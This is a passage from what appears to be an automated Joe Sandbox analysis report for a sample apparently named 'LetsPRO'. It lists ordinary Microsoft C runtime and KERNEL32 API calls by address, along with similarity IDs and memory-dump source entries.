                                        • _errno.MSVCR100(?,?,?,6C9769BE,?,?), ref: 6C976B30
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 4106058386-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C90273D
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C9027A8
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C9027B8
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C906962
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C908709
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C908711
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C908719
                                        Similarity
                                        • API ID: DecrementInterlocked
                                        • String ID:
                                        • API String ID: 3448037634-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • InterlockedIncrement.KERNEL32(00000001), ref: 6C901FA2
                                        • InterlockedIncrement.KERNEL32(?), ref: 6C90200D
                                        • InterlockedIncrement.KERNEL32(?), ref: 6C90201B
                                        • InterlockedIncrement.KERNEL32(?), ref: 6C90255C
                                        • InterlockedIncrement.KERNEL32(?), ref: 6C902565
                                        • InterlockedIncrement.KERNEL32(?), ref: 6C90256D
                                        • InterlockedIncrement.KERNEL32(?), ref: 6C902575
                                        Similarity
                                        • API ID: IncrementInterlocked
                                        • String ID:
                                        • API String ID: 3508698243-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6C900B72,00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537), ref: 6C900293
                                        • __FF_MSGBANNER.LIBCMT ref: 6C92F277
                                        • __NMSG_WRITE.LIBCMT ref: 6C92F27E
                                        • _callnewh.MSVCR100(00000001,00000001,00000000,00000000,?,6C900B72,00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001), ref: 6C92F29D
                                        • _callnewh.MSVCR100(00000001,00000000,?,6C900B72,00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C92F2C0
                                        • _errno.MSVCR100(00000000,?,6C900B72,00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15), ref: 6C92F2C6
                                        Similarity
                                        • API ID: _callnewh$AllocHeap_errno
                                        • String ID:
                                        • API String ID: 3215684309-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(6C9788F8,00000010,6C928C5C,00000000,?,00000000,?,6C90EEFC,?,6C90EF18,0000000C), ref: 6C978830
                                        • _errno.MSVCR100(6C9788F8,00000010,6C928C5C,00000000,?,00000000,?,6C90EEFC,?,6C90EF18,0000000C), ref: 6C97884F
                                        • _invalid_parameter_noinfo.MSVCR100(6C9788F8,00000010,6C928C5C,00000000,?,00000000,?,6C90EEFC,?,6C90EF18,0000000C), ref: 6C97885A
                                        • _get_osfhandle.MSVCR100(?,6C9788F8,00000010,6C928C5C,00000000,?,00000000,?,6C90EEFC,?,6C90EF18,0000000C), ref: 6C978896
                                        • FlushFileBuffers.KERNEL32(00000000,6C9788F8,00000010,6C928C5C,00000000,?,00000000,?,6C90EEFC,?,6C90EF18,0000000C), ref: 6C97889D
                                        • GetLastError.KERNEL32(?,6C90EEFC,?,6C90EF18,0000000C), ref: 6C9788A7
                                        • __doserrno.MSVCR100(?,?,?,?,6C90EEFC,?,6C90EF18,0000000C), ref: 6C9788BC
                                        • _errno.MSVCR100(6C9788F8,00000010,6C928C5C,00000000,?,00000000,?,6C90EEFC,?,6C90EF18,0000000C), ref: 6C9788C6
                                        Similarity
                                        • API ID: _errno$BuffersErrorFileFlushLast__doserrno_get_osfhandle_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3018510309-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • InterlockedFlushSList.KERNEL32(?,?,?,?,6C93F2F2), ref: 6C93F854
                                          • Part of subcall function 6C93726E: ??_V@YAXPAX@Z.MSVCR100(?,?,?,6C9372E6), ref: 6C937284
                                          • Part of subcall function 6C93726E: ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,6C9372E6), ref: 6C93728C
                                          • Part of subcall function 6C93726E: ??3@YAXPAX@Z.MSVCR100(?,?,?,?,?,6C9372E6), ref: 6C937292
                                        • InterlockedFlushSList.KERNEL32(?,?,?,?,6C93F2F2), ref: 6C93F85F
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,6C93F2F2), ref: 6C93F88F
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C93F2F2), ref: 6C93F897
                                        • ??3@YAXPAX@Z.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C93F2F2), ref: 6C93F89D
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,6C93F2F2), ref: 6C93F8B5
                                        • ??3@YAXPAX@Z.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C93F2F2), ref: 6C93F8BB
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,6C93F2F2), ref: 6C93F8CC
                                        Similarity
                                        • API ID: ??3@$FlushInterlockedList
                                        • String ID:
                                        • API String ID: 681866488-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLastError.KERNEL32(6C8F3238,?,6C90084A,6C998136), ref: 6C900730
                                        • __set_flsgetvalue.MSVCR100 ref: 6C90073E
                                          • Part of subcall function 6C900371: TlsGetValue.KERNEL32(?,6C900743), ref: 6C90037A
                                        • SetLastError.KERNEL32(00000000), ref: 6C900750
                                        • _calloc_crt.MSVCR100(00000001,00000214), ref: 6C9275F7
                                        • DecodePointer.KERNEL32(00000000), ref: 6C927615
                                        • _initptd.MSVCR100(00000000,00000000), ref: 6C927624
                                        • GetCurrentThreadId.KERNEL32 ref: 6C92762B
                                        Similarity
                                        • API ID: ErrorLast$CurrentDecodePointerThreadValue__set_flsgetvalue_calloc_crt_initptd
                                        • String ID:
                                        • API String ID: 242762301-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Similarity
                                        • API ID: __ctrlfp
                                        • String ID:
                                        • API String ID: 1574075368-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _get_fmode.MSVCR100(?,00000000,?), ref: 6C90AFD5
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6C92F949
                                        • _invalid_parameter_noinfo.MSVCR100(6C90AF40,00000014,6C90AF77,?,?,?,?,?,00000001), ref: 6C92F954
                                        Similarity
                                        • API ID: __invoke_watson_get_fmode_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 4022944351-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Similarity
                                        • API ID: _errno$_fileno_invalid_parameter_noinfo_lseek
                                        • String ID:
                                        • API String ID: 1667283477-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: Name::operator=operator+
                                        • String ID: std::nullptr_t$volatile
                                        • API String ID: 1352385710-3726895890
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(?), ref: 6C9734D9
                                        • _errno.MSVCR100(?,?,?), ref: 6C9735FA
                                        • _errno.MSVCR100(?,?,?), ref: 6C973607
                                        • _invalid_parameter_noinfo.MSVCR100(?), ref: 6C9734E4
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100(?,?), ref: 6C973502
                                        • _invalid_parameter_noinfo.MSVCR100(?,?), ref: 6C97350D
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?), ref: 6C973612
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo$_invalid_parameter
                                        • String ID:
                                        • API String ID: 113182947-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • strstr.MSVCR100(00000000,?,?), ref: 6C961A59
                                        • _errno.MSVCR100(?), ref: 6C961A7A
                                        • _invalid_parameter_noinfo.MSVCR100(?), ref: 6C961A85
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfostrstr
                                        • String ID:
                                        • API String ID: 18508804-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLastError.KERNEL32 ref: 6C947AED
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C947B05
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C947B13
                                        • GetLastError.KERNEL32(?,6C9A0D48,00000000), ref: 6C947B2E
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C947B46
                                        • SetEvent.KERNEL32(?), ref: 6C947B86
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C947BB8
                                        Similarity
                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLast$EventExceptionObjectSingleThrowWait
                                        • String ID:
                                        • API String ID: 3912761622-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C93885F
                                        • GetCurrentThread.KERNEL32 ref: 6C9388DE
                                        • _memset.LIBCMT(?,00000000,0000000C), ref: 6C938919
                                        • EnterCriticalSection.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,6C93D101,?,00000000), ref: 6C938947
                                        • LeaveCriticalSection.KERNEL32(00000000,?,00000000), ref: 6C938973
                                        • TlsGetValue.KERNEL32(?,?,00000024,6C942936,?,00000000,?,6C942B40,?,?,00000000,?,?,00000000,?), ref: 6C938995
                                        • TlsSetValue.KERNEL32(?,00000000,?,6C942B40,?,?,00000000,?,?,00000000,?), ref: 6C9389A0
                                        Similarity
                                        • API ID: CriticalSectionValue$CurrentEnterH_prolog3_LeaveThread_memset
                                        • String ID:
                                        • API String ID: 3390461318-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __fltout2.LIBCMT ref: 6C9808CB
                                          • Part of subcall function 6C97FF57: ___dtold.LIBCMT ref: 6C97FF7D
                                          • Part of subcall function 6C97FF57: _$I10_OUTPUT.LIBCMT(?,?,00000016,?,?,?,6C980296,00000000,?,?,000000FF,00000016,?,?,000000A3,?), ref: 6C97FF98
                                          • Part of subcall function 6C97FF57: strcpy_s.MSVCR100(6C980296,?,?,?,?,00000016,?,?,?,6C980296,00000000,?,?,000000FF,00000016,?), ref: 6C97FFB8
                                        • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6C9808D7
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6C9808DE
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __fptostr.LIBCMT ref: 6C980916
                                        Strings
                                        Similarity
                                        • API ID: I10____dtold__fltout2__fptostr_errno_invalid_parameter_invalid_parameter_noinfostrcpy_s
                                        • String ID: -
                                        • API String ID: 3041646763-2547889144
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _strnicmp_l.MSVCR100(?,021F17E8,?,?,7FFFFFFF,00000000,00000000,?,021F17E8,?,?,?,?,?,?,?), ref: 6C911BB9
                                          • Part of subcall function 6C90FF82: _tolower_l.MSVCR100(00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6C90FFDE
                                          • Part of subcall function 6C90FF82: _tolower_l.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6C90FFED
                                        • __crtCompareStringA.MSVCR100(?,?,00001001,?,?,021F17E8,?,00000005,7FFFFFFF,00000000,00000000,?,021F17E8,?,?), ref: 6C91633B
                                        • _errno.MSVCR100(00000000,00000000,?,021F17E8,?,?,?,?,?,?,?), ref: 6C92C4DF
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,?,021F17E8,?,?,?,?,?,?,?), ref: 6C92C4EA
                                        • _errno.MSVCR100(7FFFFFFF,00000000,00000000,?,021F17E8,?,?,?,?,?,?,?), ref: 6C92C505
                                        • _invalid_parameter_noinfo.MSVCR100(7FFFFFFF,00000000,00000000,?,021F17E8,?,?,?,?,?,?,?), ref: 6C92C510
                                        • _errno.MSVCR100(?,?,?,?,?,7FFFFFFF,00000000,00000000,?,021F17E8,?,?,?,?,?,?), ref: 6C92C517
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo_tolower_l$CompareString__crt_strnicmp_l
                                        • String ID:
                                        • API String ID: 1585791229-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _tolower_l.MSVCR100(00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6C90FFDE
                                        • _tolower_l.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6C90FFED
                                        • ___ascii_strnicmp.LIBCMT ref: 6C917726
                                        • _errno.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6C92C451
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6C92C45C
                                        • _errno.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6C92C478
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6C92C483
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo_tolower_l$___ascii_strnicmp
                                        • String ID:
                                        • API String ID: 2390777603-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: NameName::$Name::operator+
                                        • String ID: void$void
                                        • API String ID: 826178784-3746155364
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,6C949EDA), ref: 6C949EFA
                                        • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 6C949F13
                                        • GetTickCount.KERNEL32 ref: 6C949F1A
                                        • Sleep.KERNEL32(00000000), ref: 6C949F30
                                        • InterlockedPushEntrySList.KERNEL32(?,-00000008), ref: 6C949F67
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C949F90
                                        • CloseHandle.KERNEL32(?), ref: 6C949FAB
                                        Similarity
                                        • API ID: ObjectSingleWait$Base::CloseConcurrency::details::CountEntryHandleInterlockedListPushSchedulerSleepThrottlingTickTime
                                        • String ID:
                                        • API String ID: 3893709443-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C9469F6
                                        • InitializeSListHead.KERNEL32(?,00000010,6C946DD9,00000000,?), ref: 6C946A14
                                        • GetLastError.KERNEL32 ref: 6C946A47
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C946A5F
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C946A6D
                                        • GetLastError.KERNEL32 ref: 6C946A87
                                        • ??2@YAPAXI@Z.MSVCR100(00000030), ref: 6C946A95
                                        Similarity
                                        • API ID: ErrorLast$??2@Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionH_prolog3HeadInitializeListThrow
                                        • String ID:
                                        • API String ID: 3312236879-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C938B43
                                          • Part of subcall function 6C936357: __EH_prolog3.LIBCMT ref: 6C93635E
                                          • Part of subcall function 6C936357: ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,6C938B58,?,000000FF), ref: 6C9363D5
                                          • Part of subcall function 6C936357: _memset.LIBCMT(00000000,00000000,?,00000000,6C938B58,?,000000FF), ref: 6C9363E7
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,00000001,00000010,6C940C94,00000000,00000000,00000000,?,?,00000000,6C9A001C), ref: 6C938B73
                                        • GetLastError.KERNEL32(?,?,00000000,6C9A001C,000000FF,?,6C940B58,?,?,?,00000000), ref: 6C938B83
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,00000000,6C9A001C,000000FF,?,6C940B58,?,?,?,00000000), ref: 6C938B9B
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000,?,?,00000000,6C9A001C,000000FF,?,6C940B58,?,?,?,00000000), ref: 6C938BA9
                                        • ??2@YAPAXI@Z.MSVCR100(0000001C,00000000,?,?,00000000,6C9A001C,000000FF,?,6C940B58,?,?,?,00000000), ref: 6C938BBB
                                        • GetCurrentThreadId.KERNEL32 ref: 6C938BF0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: H_prolog3$??2@Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateCurrentErrorEventExceptionLastThreadThrow_memset
                                        • String ID:
                                        • API String ID: 1790702778-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _get_osfhandle.MSVCR100(?,?,?,?,6C90A7D5,?,6C90A7F0,00000010), ref: 6C90A705
                                        • _get_osfhandle.MSVCR100(?), ref: 6C90A728
                                          • Part of subcall function 6C90A6B5: __doserrno.MSVCR100(?,6C9786AC,?,?,?,?,?,?,6C92FE52,?,00000000,00000000,00000002,?,00000002,?), ref: 6C90A6F0
                                          • Part of subcall function 6C90A6B5: _errno.MSVCR100(?,6C9786AC,?,?,?,?,?,?,6C92FE52,?,00000000,00000000,00000002,?,00000002,?), ref: 6C930499
                                          • Part of subcall function 6C90A6B5: _invalid_parameter_noinfo.MSVCR100(?,6C9786AC,?,?,?,?,?,?,6C92FE52,?,00000000,00000000,00000002,?,00000002,?), ref: 6C9304A4
                                        • CloseHandle.KERNEL32(00000000), ref: 6C90A72F
                                        • _get_osfhandle.MSVCR100(00000002), ref: 6C915B02
                                        • _get_osfhandle.MSVCR100(00000001,00000002), ref: 6C915B0B
                                        • GetLastError.KERNEL32 ref: 6C92F50A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _get_osfhandle$CloseErrorHandleLast__doserrno_errno_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 1012986785-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __doserrno.MSVCR100(6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?,?,6C9138D9,?,?), ref: 6C90EAFD
                                        • __doserrno.MSVCR100(6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?,?,6C9138D9,?,?), ref: 6C93035D
                                        • _errno.MSVCR100(6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?,?,6C9138D9,?,?), ref: 6C930365
                                        • _errno.MSVCR100(6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?,?,6C9138D9,?,?), ref: 6C93037B
                                        • _invalid_parameter_noinfo.MSVCR100(6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?,?,6C9138D9,?,?), ref: 6C930386
                                        • _errno.MSVCR100(6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?,?,6C9138D9,?,?), ref: 6C93038D
                                        • __doserrno.MSVCR100(6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?,?,6C9138D9,?,?), ref: 6C930398
                                          • Part of subcall function 6C90A51F: EnterCriticalSection.KERNEL32(00000108,6C90A580,0000000C,6C90ECA7,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?), ref: 6C90A570
                                          • Part of subcall function 6C90EB48: _isatty.MSVCR100(?,?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002), ref: 6C90EBD7
                                          • Part of subcall function 6C90EB48: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E), ref: 6C90EC08
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$CriticalEnterFileSectionWrite_invalid_parameter_noinfo_isatty
                                        • String ID:
                                        • API String ID: 3635451409-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C9404B4
                                          • Part of subcall function 6C9423CD: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002), ref: 6C9423DA
                                          • Part of subcall function 6C9423CD: std::exception::exception.LIBCMT(?,00000008,00000002), ref: 6C9423F2
                                          • Part of subcall function 6C9423CD: _CxxThrowException.MSVCR100(?,6C9A0EC8,?,00000008,00000002), ref: 6C942407
                                          • Part of subcall function 6C9423CD: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000002), ref: 6C942411
                                        • ??3@YAXPAX@Z.MSVCR100(?,6C9A55E0,?,00000014), ref: 6C9404F4
                                        • ??3@YAXPAX@Z.MSVCR100(?,?,6C9A55E0,?,00000014), ref: 6C9404FA
                                        • ??2@YAPAXI@Z.MSVCR100(00000004,6C9A55E0,?,00000014), ref: 6C940503
                                        • ??0SchedulerPolicy@Concurrency@@QAE@ABV01@@Z.MSVCR100(?,6C9A55E0,?,00000014), ref: 6C940519
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT(?,00000014), ref: 6C94053E
                                        • _CxxThrowException.MSVCR100(?,6C940558,?,00000014), ref: 6C94054C
                                          • Part of subcall function 6C93B397: ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6C93B3B9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency@@Policy$Policy@Scheduler$??3@ElementExceptionKey@2@@SpinThrowValue@$??2@Concurrency::unsupported_os::unsupported_osH_prolog3Once@?$_V01@@Wait@$00@details@std::exception::exception
                                        • String ID:
                                        • API String ID: 4136520310-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Name::operator+$NameName::
                                        • String ID: throw(
                                        • API String ID: 168861036-3159766648
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C95AA73
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C95AA7E
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __wsopen_s.LIBCMT(00000000,00000000,00008002,00000040,00000000), ref: 6C95AA98
                                        • __futime64.LIBCMT(00000000,?), ref: 6C95AAAC
                                        • _errno.MSVCR100 ref: 6C95AABA
                                        • _close.MSVCR100(00000000), ref: 6C95AAC9
                                        • _errno.MSVCR100 ref: 6C95AAD4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$__futime64__wsopen_s_close_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 503974632-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C959FBE
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C959FC9
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __wsopen_s.LIBCMT(00000000,00000000,00008002,00000040,00000000), ref: 6C959FE3
                                        • __futime32.LIBCMT(00000000,?), ref: 6C959FF7
                                        • _errno.MSVCR100 ref: 6C95A005
                                        • _close.MSVCR100(00000000), ref: 6C95A014
                                        • _errno.MSVCR100 ref: 6C95A01F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$__futime32__wsopen_s_close_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2633586827-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%
